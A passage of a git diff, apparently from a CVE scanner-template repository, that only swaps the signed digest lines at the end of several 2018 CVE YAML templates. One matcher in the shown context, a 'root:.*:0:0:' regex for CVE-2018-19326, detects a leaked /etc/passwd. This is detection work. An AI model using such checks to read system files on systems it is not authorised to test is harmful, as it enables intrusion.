4a0a0047304502201ff8df2fe46c28cfea84857605ea5471986fcef0025dfcb186d825b26f4b41dc022100950f77b3e225900f68d245bc76a7e54bc63c82f592e647eb808a2315acbb9649:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19136.yaml b/http/cves/2018/CVE-2018-19136.yaml index ae987d2933..50c93d41a0 100644 --- a/http/cves/2018/CVE-2018-19136.yaml +++ b/http/cves/2018/CVE-2018-19136.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204f301c5246853945eff93923827a60e52611a9a78c79c15becacc65b6db21236022100e55ba57fa82b3b890a0c9c7529f05d392d4515b0625a29d54d45780eda751be7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200b33f3632f1e9ab5710a4a94ddd86375bd827b79ba4a2ce3005608ea50e46f5a022100efed62200a6debbc418dbf1071fc762981622c53a4906bf59f612c572e18e68b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19137.yaml b/http/cves/2018/CVE-2018-19137.yaml index 2bff36c9de..20a740bcd2 100644 --- a/http/cves/2018/CVE-2018-19137.yaml +++ b/http/cves/2018/CVE-2018-19137.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b8b80cb827acebd82aec44a1c08b36097619340bc65fa829c2bf196de3d68d45022100eb79c2f34fc72750506bec357c368393d4e667db54cc2aff120a70574b665aac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b65a58c011a1ca1bccb5b49e72d7a2e13bd7ed8f927c597dea568cc99763f05c0220795448956a78ec132ee1dcf7d8773447335ebdafa10a3f1a36974785c7488b4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19287.yaml b/http/cves/2018/CVE-2018-19287.yaml index 711581b43e..14c152e95e 100644 --- a/http/cves/2018/CVE-2018-19287.yaml +++ b/http/cves/2018/CVE-2018-19287.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b411059e8363c4a572600337f21146dd39cf5e140c8f72678cdd4ba2f168bcd6022100a92ec95a257ad9b13106e84ff3d553b2cf2f559670c8504b72fb8a8a159119e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022024f371e16542ca87f35620b479738c763db8b1d9b01509f5e5f2a3a9cd0d991c02210089e02efe0e0d83861715f95014649a0e7eeabbf577319dc672cc62eb77fa35da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19326.yaml b/http/cves/2018/CVE-2018-19326.yaml index 924d50f043..15d8112cf6 100644 --- a/http/cves/2018/CVE-2018-19326.yaml +++ b/http/cves/2018/CVE-2018-19326.yaml @@ -48,4 +48,4 @@ http: part: body regex: - "root:.*:0:0:" -# digest: 4a0a004730450221008ba74a09a2d2f34678a64238aca41057e02cc9b5a1cb10eab316b278cbc540bd02201737606efe00aeeccf0a3889008db0ad4e27a4fcec778a7240c1535af71b7363:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d1f5d813b1fbf4bdb327657828cff4093eb34e641a9871908af86def04703a4c022100e9fa4cecf877c49fbb8aab0d9a7630897407677e2123a1bcb41ad0257cbf2913:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19365.yaml b/http/cves/2018/CVE-2018-19365.yaml index ab2f587362..04691e3ba8 100644 --- a/http/cves/2018/CVE-2018-19365.yaml +++ b/http/cves/2018/CVE-2018-19365.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009d8f2260d6ed961d01036c4cd7023d10bc804d4ac7cc87e2cff9cdf7f6291544022062bb9b5fc97e34b1db32914cc1bd161c75c0eccb428ecc6a3c8937f507cb3893:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022076ec3041bf674971dc701fe704011f356e27e9e3683e0e9ad4514157d8706ee0022076199d1a39e57dd13375cd9903f9f2a86ae3fd845b01cf751ddfb20b731bbed7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19386.yaml b/http/cves/2018/CVE-2018-19386.yaml index 8d3240ff37..a46defd3ed 100644 --- a/http/cves/2018/CVE-2018-19386.yaml +++ b/http/cves/2018/CVE-2018-19386.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202509b59bc3f7b365cd0a9849aceee35902998c0c68765e4465c9481b25692e84022100cbeec72fc01472a0e85b57b01c001ba0bc90212ac0e03de6304c3a87efb4b000:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ac6350f183dc7f5aea1eb2b6d71d209cfc77d4f698cf4871b7a39541e1663352022100d9929660fb7089de39513712397213d2591687de2c106bbf719c4fed4d1cb796:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19439.yaml b/http/cves/2018/CVE-2018-19439.yaml index 5cad18701c..300fcc0533 100644 --- a/http/cves/2018/CVE-2018-19439.yaml +++ b/http/cves/2018/CVE-2018-19439.yaml @@ -36,4 +36,4 @@ http: part: body words: - "